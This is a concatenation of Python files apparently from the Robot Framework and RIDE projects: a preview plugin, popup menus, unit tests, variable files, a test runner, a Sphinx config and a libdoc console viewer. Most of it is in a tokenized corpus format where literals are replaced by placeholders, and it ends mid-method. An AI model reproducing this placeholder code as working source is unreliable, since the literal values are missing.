<s> import wx . html <EOL> from StringIO import StringIO <EOL> from robotide . pluginapi import Plugin , ActionInfo , TreeAwarePluginMixin <EOL> from robotide . publish import ( RideTreeSelection , RideNotebookTabChanged , <EOL> RideTestCaseAdded , RideUserKeywordAdded ) <EOL> from robotide . robotapi import TestCase , UserKeyword <EOL> from robotide . widgets import ButtonWithHandler , Font <EOL> from robotide . utils import Printing <EOL> class PreviewPlugin ( Plugin , TreeAwarePluginMixin ) : <EOL> """<STR_LIT>""" <EOL> datafile = property ( lambda self : self . get_selected_datafile ( ) ) <EOL> def __init__ ( self , application ) : <EOL> Plugin . __init__ ( self , application , default_settings = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . _panel = None <EOL> def enable ( self ) : <EOL> self . register_action ( ActionInfo ( '<STR_LIT>' , '<STR_LIT>' , self . OnShowPreview , <EOL> shortcut = '<STR_LIT>' , <EOL> doc = '<STR_LIT>' , <EOL> position = <NUM_LIT> ) ) <EOL> self . subscribe ( self . OnTreeSelection , RideTreeSelection ) <EOL> self . subscribe ( self . OnTabChanged , RideNotebookTabChanged ) <EOL> self . subscribe ( self . _update_preview , RideTestCaseAdded ) <EOL> self . subscribe ( self . _update_preview , RideUserKeywordAdded ) <EOL> self . add_self_as_tree_aware_plugin ( ) <EOL> def disable ( self ) : <EOL> self . remove_self_from_tree_aware_plugins ( ) <EOL> self . unsubscribe_all ( ) <EOL> self . unregister_actions ( ) <EOL> self . delete_tab ( self . _panel ) <EOL> self . _panel = None <EOL> def is_focused ( self ) : <EOL> return self . tab_is_visible ( self . _panel ) <EOL> def OnShowPreview ( self , event ) : <EOL> if not self . _panel : <EOL> self . _panel = PreviewPanel ( self , self . notebook ) <EOL> self . show_tab ( self . _panel ) <EOL> self . _update_preview ( ) <EOL> def OnTreeSelection ( self , event ) : <EOL> if self . is_focused ( ) : <EOL> self . _panel . tree_node_selected ( event . 
item ) <EOL> def OnTabChanged ( self , event ) : <EOL> self . _update_preview ( ) <EOL> def _update_preview ( self , event = None ) : <EOL> if self . is_focused ( ) and self . datafile : <EOL> self . _panel . update_preview ( ) <EOL> class PreviewPanel ( wx . Panel ) : <EOL> _formats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , parent , notebook ) : <EOL> wx . Panel . __init__ ( self , notebook ) <EOL> self . _parent = parent <EOL> main_sizer = wx . BoxSizer ( wx . VERTICAL ) <EOL> self . SetSizer ( main_sizer ) <EOL> self . _format = parent . format <EOL> self . __view = None <EOL> self . _printing = Printing ( self ) <EOL> box = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> box . Add ( self . _chooser ( ) ) <EOL> box . Add ( self . _print_button ( ) , <NUM_LIT:1> , wx . ALIGN_CENTER_VERTICAL | wx . EXPAND ) <EOL> self . Sizer . Add ( box ) <EOL> notebook . AddPage ( self , "<STR_LIT>" ) <EOL> def OnPrint ( self , evt ) : <EOL> self . _printing . preview_text ( self . _get_content ( ) ) <EOL> @ property <EOL> def _file_format ( self ) : <EOL> if self . _format == '<STR_LIT>' : <EOL> return self . _format . lower ( ) <EOL> return '<STR_LIT>' <EOL> @ property <EOL> def _pipe_separated ( self ) : <EOL> return '<STR_LIT>' in self . _format <EOL> def _chooser ( self ) : <EOL> chooser = wx . RadioBox ( self , label = '<STR_LIT>' , choices = self . _formats ) <EOL> chooser . SetStringSelection ( self . _format ) <EOL> self . Bind ( wx . EVT_RADIOBOX , self . OnTypeChanged , chooser ) <EOL> return chooser <EOL> def _print_button ( self ) : <EOL> return ButtonWithHandler ( self , '<STR_LIT>' ) <EOL> @ property <EOL> def _view ( self ) : <EOL> view_class = HtmlView if self . _file_format == '<STR_LIT:html>' else TxtView <EOL> if isinstance ( self . __view , view_class ) : <EOL> return self . __view <EOL> self . _remove_current_view ( ) <EOL> self . __view = self . _create_view ( view_class ) <EOL> return self . 
__view <EOL> def _remove_current_view ( self ) : <EOL> if self . __view : <EOL> self . Sizer . Remove ( self . __view ) <EOL> self . __view . Destroy ( ) <EOL> def _create_view ( self , view_class ) : <EOL> view = view_class ( self ) <EOL> self . Sizer . Add ( view , <NUM_LIT:1> , wx . EXPAND | wx . ALL , border = <NUM_LIT:8> ) <EOL> self . Sizer . Layout ( ) <EOL> return view <EOL> def tree_node_selected ( self , item ) : <EOL> self . update_preview ( ) <EOL> self . _view . scroll_to_subitem ( item ) <EOL> def update_preview ( self ) : <EOL> self . _view . set_content ( self . _get_content ( ) ) <EOL> def _get_content ( self ) : <EOL> datafile = self . _parent . datafile <EOL> if not datafile : <EOL> return '<STR_LIT>' <EOL> output = StringIO ( ) <EOL> try : <EOL> datafile . save ( <EOL> output = output , <EOL> format = self . _file_format , <EOL> pipe_separated = self . _pipe_separated , <EOL> txt_separating_spaces = self . _parent . global_settings [ '<STR_LIT>' ] <EOL> ) <EOL> except Exception , e : <EOL> return "<STR_LIT>" % ( datafile . name , e ) <EOL> else : <EOL> return output . getvalue ( ) <EOL> def OnTypeChanged ( self , event ) : <EOL> self . _format = event . String <EOL> self . update_preview ( ) <EOL> self . _parent . save_setting ( '<STR_LIT>' , self . _format ) <EOL> class HtmlView ( wx . html . HtmlWindow ) : <EOL> def __init__ ( self , parent ) : <EOL> wx . html . HtmlWindow . __init__ ( self , parent ) <EOL> self . SetStandardFonts ( ) <EOL> def set_content ( self , content ) : <EOL> self . SetPage ( content ) <EOL> def scroll_to_subitem ( self , item ) : <EOL> anchor = self . _get_anchor ( item . data ) <EOL> if self . HasAnchor ( anchor ) : <EOL> self . ScrollToAnchor ( anchor ) <EOL> self . ScrollLines ( - <NUM_LIT:1> ) <EOL> else : <EOL> self . Scroll ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def _get_anchor ( self , data ) : <EOL> if isinstance ( data , UserKeyword ) : <EOL> return '<STR_LIT>' % data . 
name <EOL> if isinstance ( data , TestCase ) : <EOL> return '<STR_LIT>' % data . name <EOL> return '<STR_LIT>' <EOL> class TxtView ( wx . TextCtrl ) : <EOL> def __init__ ( self , parent ) : <EOL> wx . TextCtrl . __init__ ( self , parent , style = wx . TE_MULTILINE ) <EOL> self . SetEditable ( False ) <EOL> self . SetFont ( Font ( ) . fixed ) <EOL> def set_content ( self , content ) : <EOL> self . SetValue ( content ) <EOL> def scroll_to_subitem ( self , item ) : <EOL> pass </s>
<s> import wx <EOL> class PopupCreator ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _external_hooks = [ ] <EOL> def add_hook ( self , hook ) : <EOL> self . _external_hooks . append ( hook ) <EOL> def remove_hook ( self , hook ) : <EOL> self . _external_hooks . remove ( hook ) <EOL> def _get_all_actions ( self , fixed_menu_items , data ) : <EOL> menu_items = fixed_menu_items <EOL> external_items = self . _get_external_menu_items ( data ) <EOL> if external_items : <EOL> menu_items . add_separator ( ) <EOL> for item in external_items : <EOL> menu_items . add_menu_item ( item ) <EOL> return menu_items <EOL> def _get_external_menu_items ( self , data ) : <EOL> menu_items = [ ] <EOL> for hook in self . _external_hooks : <EOL> menu_items . extend ( hook ( data ) ) <EOL> return menu_items <EOL> def show ( self , parent , fixed_menu_items , data ) : <EOL> PopupMenu ( parent , self . _get_all_actions ( fixed_menu_items , data ) ) <EOL> class PopupMenu ( wx . Menu ) : <EOL> def __init__ ( self , parent , menu_items ) : <EOL> wx . Menu . __init__ ( self ) <EOL> for item in menu_items : <EOL> if item . is_separator ( ) : <EOL> self . AppendSeparator ( ) <EOL> else : <EOL> self . _add_item ( parent , item ) <EOL> parent . PopupMenu ( self ) <EOL> self . Destroy ( ) <EOL> def _add_item ( self , parent , item ) : <EOL> id_ = wx . NewId ( ) <EOL> self . Append ( id_ , item . name ) <EOL> parent . Bind ( wx . EVT_MENU , item . callable , id = id_ ) <EOL> class PopupMenuItems ( object ) : <EOL> def __init__ ( self , parent = None , menu_names = [ ] ) : <EOL> self . _items = [ ] <EOL> for item in menu_names : <EOL> self . add_menu_item ( PopupMenuItem ( item , parent = parent ) ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _items ) <EOL> def add_menu_item ( self , item ) : <EOL> self . _items . append ( item ) <EOL> def add_separator ( self ) : <EOL> self . 
add_menu_item ( PopupMenuItem ( '<STR_LIT>' ) ) <EOL> class PopupMenuItem ( object ) : <EOL> def __init__ ( self , name , callable = None , parent = None ) : <EOL> self . name = name <EOL> self . callable = self . _get_callable ( name , callable , parent ) <EOL> def _get_callable ( self , name , callable , parent ) : <EOL> if callable : <EOL> return callable <EOL> if name == '<STR_LIT>' : <EOL> return None <EOL> handler_name = '<STR_LIT>' . join ( x for x in name . split ( '<STR_LIT:\t>' ) [ <NUM_LIT:0> ] . title ( ) if not x . isspace ( ) ) <EOL> return getattr ( parent , '<STR_LIT>' + handler_name ) <EOL> def is_separator ( self ) : <EOL> return self . name == '<STR_LIT>' </s>
<s> import tempfile <EOL> import unittest <EOL> import os <EOL> import datafilereader <EOL> from robotide . controller . filecontrollers import TestDataDirectoryController , ExcludedDirectoryController , DirtyRobotDataException <EOL> class TestExcludesLogic ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . project = datafilereader . construct_project ( datafilereader . SIMPLE_TEST_SUITE_PATH , tempfile . gettempdir ( ) ) <EOL> def tearDown ( self ) : <EOL> p = self . project . _settings . excludes . _exclude_file_path <EOL> if os . path . exists ( p ) : <EOL> os . remove ( p ) <EOL> def _get_resource_dir ( self ) : <EOL> return datafilereader . get_ctrl_by_name ( datafilereader . SIMPLE_TEST_SUITE_INNER_RESOURCE_DIR , self . project . datafiles ) <EOL> def test_excluding_and_including ( self ) : <EOL> resource_dir = self . _get_resource_dir ( ) <EOL> self . assertEqual ( resource_dir . __class__ , TestDataDirectoryController ) <EOL> resource_dir . exclude ( ) <EOL> resource_dir = self . _get_resource_dir ( ) <EOL> self . assertEqual ( resource_dir . __class__ , ExcludedDirectoryController ) <EOL> resource_dir . remove_from_excludes ( ) <EOL> resource_dir = self . _get_resource_dir ( ) <EOL> self . assertEqual ( resource_dir . __class__ , TestDataDirectoryController ) <EOL> def test_excluding_throws_exception_if_dirty_data ( self ) : <EOL> resource_dir = self . _get_resource_dir ( ) <EOL> resu = resource_dir . children [ <NUM_LIT:0> ] <EOL> resu . mark_dirty ( ) <EOL> self . assertRaises ( DirtyRobotDataException , resource_dir . exclude ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import unittest <EOL> from nose . tools import assert_equals <EOL> from robotide . robotapi import TestCase , TestCaseFile <EOL> from robotide . controller . commands import ChangeTag <EOL> from robotide . controller . filecontrollers import TestCaseFileController <EOL> from robotide . controller . macrocontrollers import TestCaseController <EOL> from robotide . controller . tablecontrollers import TestCaseTableController <EOL> from robotide . controller . tags import Tag <EOL> from robotide . controller . ui . treecontroller import TreeController , _History , TestSelectionController <EOL> class ActionRegistererMock ( object ) : <EOL> def register_actions ( self , action_collections ) : <EOL> self . action_collections = action_collections <EOL> def register_action ( self , action ) : <EOL> pass <EOL> class TestTreeController ( unittest . TestCase ) : <EOL> def test_register_tree_actions ( self ) : <EOL> mocked_ar = ActionRegistererMock ( ) <EOL> TreeController ( None , mocked_ar , None , None ) . register_tree_actions ( ) <EOL> self . assertEquals ( <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ a . name for a in mocked_ar . action_collections ] ) <EOL> class _BaseTreeControllerTest ( object ) : <EOL> def setUp ( self ) : <EOL> self . history = _History ( ) <EOL> self . controller = TreeController ( <EOL> self . _tree_mock ( ) , None , None , None , history = self . history ) <EOL> self . controller . add_to_history ( "<STR_LIT>" ) <EOL> def _tree_mock ( self ) : <EOL> tree_mock = lambda : <NUM_LIT:0> <EOL> self . _tree_mock_items = [ ] <EOL> tree_mock . SelectItem = lambda i : self . _tree_mock_items . append ( i ) <EOL> return tree_mock <EOL> def _select_node ( self , value ) : <EOL> self . controller . add_to_history ( value ) <EOL> def _go_back_and_return_selection ( self ) : <EOL> self . controller . OnGoBack ( None ) <EOL> return self . _tree_mock_items [ - <NUM_LIT:1> ] <EOL> def _go_forward_and_return_selection ( self ) : <EOL> self . controller . 
OnGoForward ( None ) <EOL> return self . _tree_mock_items [ - <NUM_LIT:1> ] <EOL> class TestNavigationHistory ( _BaseTreeControllerTest , unittest . TestCase ) : <EOL> def test_go_back_one_level ( self ) : <EOL> self . _select_node ( '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , self . _go_back_and_return_selection ( ) ) <EOL> def test_go_back_two_levels ( self ) : <EOL> nodes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for name in nodes : <EOL> self . _select_node ( name ) <EOL> nodes . reverse ( ) <EOL> for name in nodes [ <NUM_LIT:1> : ] : <EOL> self . assertEquals ( name , self . _go_back_and_return_selection ( ) ) <EOL> def test_it_is_not_possible_to_go_back_farther_than_history ( self ) : <EOL> nodes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for name in nodes : <EOL> self . _select_node ( name ) <EOL> nodes . reverse ( ) <EOL> for name in nodes [ <NUM_LIT:1> : ] + [ '<STR_LIT>' ] : <EOL> self . _go_back_and_assert_selection ( name ) <EOL> self . _go_back_and_assert_selection ( '<STR_LIT>' ) <EOL> def test_go_back_with_selecting_in_between ( self ) : <EOL> nodes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for name in nodes : <EOL> self . _select_node ( name ) <EOL> self . _go_back_and_assert_selection ( '<STR_LIT>' ) <EOL> self . _select_node ( '<STR_LIT>' ) <EOL> self . _go_back_and_assert_selection ( '<STR_LIT>' ) <EOL> def test_go_forward ( self ) : <EOL> nodes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for name in nodes : <EOL> self . _select_node ( name ) <EOL> for _ in range ( <NUM_LIT:3> ) : <EOL> self . controller . OnGoBack ( None ) <EOL> for name in nodes : <EOL> self . _go_forward_and_assert_selection ( name ) <EOL> def test_go_back_and_forward_between_suite_and_resource ( self ) : <EOL> nodes = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for name in nodes : <EOL> self . _select_node ( name ) <EOL> self . _go_back_and_assert_selection ( '<STR_LIT>' ) <EOL> self . 
_go_back_and_assert_selection ( '<STR_LIT>' ) <EOL> self . _go_forward_and_assert_selection ( '<STR_LIT>' ) <EOL> self . _go_forward_and_assert_selection ( '<STR_LIT>' ) <EOL> def _go_back_and_assert_selection ( self , expected_selection ) : <EOL> assert_equals ( self . _go_back_and_return_selection ( ) , expected_selection ) <EOL> def _go_forward_and_assert_selection ( self , expected_selection ) : <EOL> assert_equals ( <EOL> self . _go_forward_and_return_selection ( ) , expected_selection ) <EOL> class TestTestSelectionController ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _tsc = TestSelectionController ( ) <EOL> def test_test_selection_is_empty_by_default ( self ) : <EOL> self . assertTrue ( self . _tsc . is_empty ( ) ) <EOL> def test_test_selection_is_not_empty_when_it_contains_a_test ( self ) : <EOL> self . _tsc . select ( self . _create_test ( ) ) <EOL> self . assertFalse ( self . _tsc . is_empty ( ) ) <EOL> def test_test_selection_is_empty_after_removing_same_test_from_there_even_when_it_is_not_the_same_object ( self ) : <EOL> self . _tsc . select ( self . _create_test ( ) ) <EOL> self . _tsc . select ( self . _create_test ( ) , False ) <EOL> self . assertTrue ( self . _tsc . is_empty ( ) ) <EOL> def test_is_test_selected ( self ) : <EOL> test = self . _create_test ( ) <EOL> self . assertFalse ( self . _tsc . is_test_selected ( test ) ) <EOL> self . _tsc . select ( test ) <EOL> self . assertTrue ( self . _tsc . is_test_selected ( test ) ) <EOL> def test_adding_tag_to_selected_tests ( self ) : <EOL> tests = [ self . _create_test ( '<STR_LIT>' % i ) for i in range ( <NUM_LIT:10> ) ] <EOL> for t in tests : <EOL> self . _tsc . select ( t ) <EOL> self . _tsc . add_tag ( '<STR_LIT:foo>' ) <EOL> for t in tests : <EOL> self . assertEqual ( [ tag . name for tag in t . tags ] , [ '<STR_LIT:foo>' ] ) <EOL> def test_adding_a_tag_to_test_with_a_default_tag ( self ) : <EOL> test = self . _create_test ( ) <EOL> test . datafile_controller . 
default_tags . execute ( <EOL> ChangeTag ( Tag ( None ) , '<STR_LIT:default>' ) ) <EOL> assert_equals ( [ t . name for t in test . tags ] , [ '<STR_LIT:default>' ] ) <EOL> self . _tsc . select ( test ) <EOL> self . _tsc . add_tag ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ t . name for t in test . tags ] , [ '<STR_LIT:default>' , '<STR_LIT>' ] ) <EOL> def _create_test ( self , name = '<STR_LIT:test>' ) : <EOL> suite = TestCaseFile ( source = '<STR_LIT>' ) <EOL> suite_controller = TestCaseFileController ( suite ) <EOL> parent = TestCaseTableController ( <EOL> suite_controller , suite . testcase_table ) <EOL> test = TestCase ( parent = lambda : <NUM_LIT:0> , name = name ) <EOL> return TestCaseController ( parent , test ) </s>
<s> class libi ( object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def onething ( self ) : <EOL> pass </s>
<s> import os . path <EOL> import unittest <EOL> from resources . setting_utils import TestSettingsHelper <EOL> from robotide . preferences . settings import SettingsMigrator <EOL> class TestMergeSettings ( TestSettingsHelper ) : <EOL> def setUp ( self ) : <EOL> base = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' , '<STR_LIT>' ) <EOL> self . settings_cfg = os . path . join ( base , '<STR_LIT>' ) <EOL> self . user_cfg = os . path . join ( base , '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_merge_settings ( self ) : <EOL> SettingsMigrator ( self . settings_cfg , self . user_cfg ) . merge ( ) <EOL> SettingsMigrator ( self . settings_cfg , self . user_cfg ) . merge ( ) <EOL> content = self . _read_settings_file_content ( self . user_cfg ) <EOL> line_count = len ( content . splitlines ( ) ) <EOL> self . assertEquals ( line_count , <NUM_LIT> , "<STR_LIT>" % <EOL> line_count ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> from os . path import abspath , dirname , exists , join , normpath <EOL> from robot import run_cli , rebot <EOL> from robotstatuschecker import process_output <EOL> CURDIR = dirname ( abspath ( __file__ ) ) <EOL> OUTPUT_ROOT = join ( CURDIR , '<STR_LIT>' ) <EOL> OUTPUT_PYTHON = join ( OUTPUT_ROOT , '<STR_LIT>' ) <EOL> OUTPUT_JYTHON = join ( OUTPUT_ROOT , '<STR_LIT>' ) <EOL> JAR_PATH = join ( CURDIR , '<STR_LIT:..>' , '<STR_LIT>' ) <EOL> sys . path . append ( join ( CURDIR , '<STR_LIT:..>' , '<STR_LIT:src>' ) ) <EOL> COMMON_OPTS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def atests ( * opts ) : <EOL> if os . name == '<STR_LIT>' : <EOL> jython ( * opts ) <EOL> process_output ( join ( OUTPUT_JYTHON , '<STR_LIT>' ) ) <EOL> return rebot ( join ( OUTPUT_JYTHON , '<STR_LIT>' ) , outputdir = OUTPUT_JYTHON ) <EOL> elif os . name == '<STR_LIT>' : <EOL> os_includes = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> os_includes = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> python ( * ( os_includes + opts ) ) <EOL> process_output ( join ( OUTPUT_PYTHON , '<STR_LIT>' ) ) <EOL> return rebot ( join ( OUTPUT_PYTHON , '<STR_LIT>' ) , outputdir = OUTPUT_PYTHON ) <EOL> def python ( * opts ) : <EOL> try : <EOL> run_cli ( [ '<STR_LIT>' , OUTPUT_PYTHON , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> + list ( COMMON_OPTS + opts ) ) <EOL> except SystemExit : <EOL> pass <EOL> def jython ( * opts ) : <EOL> try : <EOL> run_cli ( [ '<STR_LIT>' , OUTPUT_JYTHON , <EOL> '<STR_LIT>' , JAR_PATH , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> + list ( COMMON_OPTS + opts ) ) <EOL> except SystemExit : <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) == <NUM_LIT:1> or '<STR_LIT>' in sys . argv : <EOL> print ( __doc__ ) <EOL> rc = <NUM_LIT> <EOL> else : <EOL> rc = atests ( * sys . argv [ <NUM_LIT:1> : ] ) <EOL> print "<STR_LIT>" % rc <EOL> sys . exit ( rc ) </s>
<s> import os <EOL> def reports_should_be_equal ( file1 , file2 ) : <EOL> with open ( file1 . replace ( '<STR_LIT:/>' , os . sep ) ) as f1 : <EOL> content1 = f1 . readlines ( ) <EOL> with open ( file2 . replace ( '<STR_LIT:/>' , os . sep ) ) as f2 : <EOL> content2 = f2 . readlines ( ) <EOL> for l1 , l2 in zip ( content1 , content2 ) : <EOL> if not _lines_are_equal ( l1 , l2 ) : <EOL> raise AssertionError ( '<STR_LIT>' % ( l1 , l2 ) ) <EOL> if len ( content1 ) != len ( content2 ) : <EOL> raise AssertionError ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( file1 , len ( content1 ) , <EOL> file2 , len ( content2 ) ) ) <EOL> def _lines_are_equal ( line1 , line2 ) : <EOL> for changing in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if changing in line1 and changing in line2 : <EOL> return True <EOL> return line1 == line2 </s>
<s> from DynamicLibrary import DynamicLibrary <EOL> KEYWORDS = { <EOL> '<STR_LIT>' : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } <EOL> class DynamicLibraryWithKwargsSupport ( DynamicLibrary ) : <EOL> def __init__ ( self ) : <EOL> DynamicLibrary . __init__ ( self , ** KEYWORDS ) <EOL> def run_keyword ( self , name , args , kwargs ) : <EOL> return self . _pretty ( * args , ** kwargs ) </s>
<s> file_var1 = - <NUM_LIT> <EOL> file_var2 = '<STR_LIT>' <EOL> LIST__file_listvar = [ True , <NUM_LIT> , '<STR_LIT>' ] <EOL> escaping = '<STR_LIT>' </s>
<s> var_in_variable_file = '<STR_LIT>' </s>
<s> import platform <EOL> HOST = '<STR_LIT:localhost>' <EOL> USERNAME = '<STR_LIT:test>' <EOL> PASSWORD = '<STR_LIT:test>' <EOL> PROMPT = '<STR_LIT>' <EOL> FULL_PROMPT = '<STR_LIT>' % ( USERNAME , platform . uname ( ) [ <NUM_LIT:1> ] ) <EOL> PROMPT_START = '<STR_LIT>' % USERNAME <EOL> HOME = '<STR_LIT>' % USERNAME </s>
<s> class Listener ( object ) : <EOL> def close ( self ) : <EOL> pass <EOL> class Listener2 ( object ) : <EOL> def close ( self ) : <EOL> pass <EOL> ROBOT_LIBRARY_LISTENER = [ Listener ( ) , Listener2 ( ) ] </s>
<s> SCALAR = '<STR_LIT>' <EOL> SCALAR_WITH_ESCAPES = r'<STR_LIT>' <EOL> SCALAR_LIST = '<STR_LIT>' . split ( ) <EOL> LIST__LIST = SCALAR_LIST <EOL> PRIORITIES_1 = PRIORITIES_2 = '<STR_LIT>' </s>
<s> class FatalCatastrophyException ( RuntimeError ) : <EOL> ROBOT_EXIT_ON_FAILURE = True <EOL> class ContinuableApocalypseException ( RuntimeError ) : <EOL> ROBOT_CONTINUE_ON_FAILURE = True <EOL> def exit_on_failure ( ) : <EOL> raise FatalCatastrophyException ( ) <EOL> def raise_continuable_failure ( msg = '<STR_LIT>' ) : <EOL> raise ContinuableApocalypseException ( msg ) </s>
# Sphinx configuration for building the API documentation.
import sys, os
# Make the project's src/ importable so autodoc can find the package.
sys.path.insert(<NUM_LIT:0>, os.path.abspath(os.path.join('<STR_LIT:.>', '<STR_LIT:..>', '<STR_LIT:..>', '<STR_LIT:src>')))
from robot.version import get_version

needs_sphinx = '<STR_LIT>'
extensions = ['<STR_LIT>', '<STR_LIT>']
autoclass_content = '<STR_LIT>'
autodoc_default_flags = ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>']
autodoc_member_order = '<STR_LIT>'
# Modules mocked away so docs build without these optional dependencies.
autodoc_mock_imports = [
    '<STR_LIT>',
    '<STR_LIT>', '<STR_LIT>',
    '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
    '<STR_LIT>', '<STR_LIT>',
    '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
    '<STR_LIT>', '<STR_LIT>']
templates_path = ['<STR_LIT>']
source_suffix = '<STR_LIT>'
master_doc = '<STR_LIT:index>'
project = u'<STR_LIT>'
copyright = u'<STR_LIT>'
# 'naked' version for the short X.Y form, full string for the release.
version = get_version(naked=True)
release = get_version()
exclude_patterns = ['<STR_LIT>']
pygments_style = '<STR_LIT>'
html_static_path = ['<STR_LIT>']
htmlhelp_basename = '<STR_LIT>'
latex_elements = {
}
latex_documents = [
    ('<STR_LIT:index>', '<STR_LIT>', u'<STR_LIT>',
     u'<STR_LIT>', '<STR_LIT>'),
]
man_pages = [
    ('<STR_LIT:index>', '<STR_LIT>', u'<STR_LIT>',
     [u'<STR_LIT>'], <NUM_LIT:1>)
]
texinfo_documents = [
    ('<STR_LIT:index>', '<STR_LIT>', u'<STR_LIT>', u'<STR_LIT>',
     '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'),
]


def non_example_lines(line):
    # Filter predicate: True (keep) for lines NOT starting with any of the
    # example-marker prefixes; returns None (falsy) otherwise.
    if not line.startswith(('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')):
        return True


def remove_library_examples(app, what, name, obj, options, lines):
    # autodoc-process-docstring hook: strips example lines from docstrings
    # of names matching the given prefix. 'lines' must be edited in place.
    if name.startswith("<STR_LIT>"):
        lines[:] = filter(non_example_lines, lines)


def setup(app):
    """Sphinx entry point: register the docstring post-processing hook."""
    app.connect('<STR_LIT>', remove_library_examples)
import textwrap

from robot.utils import MultiMatcher, console_encode
from robot.errors import DataError


class ConsoleViewer(object):
    """Shows library documentation on the console.

    Supported commands are ``list``, ``show`` and ``version`` (the exact
    placeholder strings below decide which); invalid commands raise
    ``DataError``.
    """

    def __init__(self, libdoc):
        self._libdoc = libdoc
        self._keywords = KeywordMatcher(libdoc)

    @classmethod
    def handles(cls, command):
        # Case-insensitive membership test against the supported commands.
        return command.lower() in ['<STR_LIT:list>', '<STR_LIT>', '<STR_LIT:version>']

    @classmethod
    def validate_command(cls, command, args):
        """Raise DataError for unknown commands or extra arguments."""
        if not cls.handles(command):
            raise DataError("<STR_LIT>" % command)
        if command.lower() == '<STR_LIT:version>' and args:
            raise DataError("<STR_LIT>")

    def view(self, command, *args):
        # Dispatch to the method named after the (validated) command.
        self.validate_command(command, args)
        getattr(self, command.lower())(*args)

    def list(self, *patterns):
        # Each pattern is wrapped with the template before matching.
        for kw in self._keywords.search('<STR_LIT>' % p for p in patterns):
            self._console(kw.name)

    def show(self, *names):
        # Intro (and possible init sections) shown only when the special
        # name matches; then every matching keyword is printed.
        if MultiMatcher(names, match_if_no_patterns=True).match('<STR_LIT>'):
            self._show_intro(self._libdoc)
            if self._libdoc.inits:
                self._show_inits(self._libdoc)
        for kw in self._keywords.search(names):
            self._show_keyword(kw)

    def version(self):
        self._console(self._libdoc.version or '<STR_LIT>')

    def _console(self, msg):
        # All output funneled through console_encode for safe encoding.
        print(console_encode(msg))

    def _show_intro(self, lib):
        self._header(lib.name, underline='<STR_LIT:=>')
        named_args = '<STR_LIT>' if lib.named_args else '<STR_LIT>'
        self._data([('<STR_LIT>', lib.version), ('<STR_LIT>', lib.scope),
                    ('<STR_LIT>', named_args)])
        self._doc(lib.doc)

    def _show_inits(self, lib):
        self._header('<STR_LIT>', underline='<STR_LIT:->')
        for init in lib.inits:
            self._show_keyword(init, show_name=False)

    def _show_keyword(self, kw, show_name=True):
        if show_name:
            self._header(kw.name, underline='<STR_LIT:->')
        self._data([('<STR_LIT>', '<STR_LIT>' % '<STR_LIT:U+002CU+0020>'.join(kw.args))])
        self._doc(kw.doc)

    def _header(self, name, underline):
        # Underline drawn to exactly the width of the name.
        self._console('<STR_LIT>' % (name, underline * len(name)))

    def _data(self, items):
        # Align values by padding names to the longest name plus a margin;
        # falsy values are skipped entirely.
        ljust = max(len(name) for name, _ in items) + <NUM_LIT:3>
        for name, value in items:
            if value:
                text = '<STR_LIT>' % ((name + '<STR_LIT::>').ljust(ljust), value)
                self._console(self._wrap(text, subsequent_indent='<STR_LIT:U+0020>' * ljust))

    def _doc(self, doc):
        self._console('<STR_LIT>')
        for line in doc.splitlines():
            self._console(self._wrap(line))
        if doc:
            self._console('<STR_LIT>')

    def _wrap(self, text, width=<NUM_LIT>, **config):
        # textwrap.wrap returns a list of lines; re-join with newlines.
        return '<STR_LIT:\n>'.join(textwrap.wrap(text, width=width, **config))


class KeywordMatcher(object):
    """Yields keywords from a libdoc whose names match given patterns."""

    def __init__(self, libdoc):
        self._keywords = libdoc.keywords

    def search(self, patterns):
        # With no patterns at all, every keyword matches.
        matcher = MultiMatcher(patterns, match_if_no_patterns=True)
        for kw in self._keywords:
            if matcher.match(kw.name):
                yield kw
from robot.utils import py2to3
from .tags import TagPatterns


@py2to3
class Criticality(object):
    """Resolves criticality of tags and tests from two tag-pattern sets."""

    def __init__(self, critical_tags=None, non_critical_tags=None):
        self.critical_tags = self._get_tag_patterns(critical_tags)
        self.non_critical_tags = self._get_tag_patterns(non_critical_tags)

    def _get_tag_patterns(self, tags):
        # Pass ready-made TagPatterns through untouched; wrap anything else.
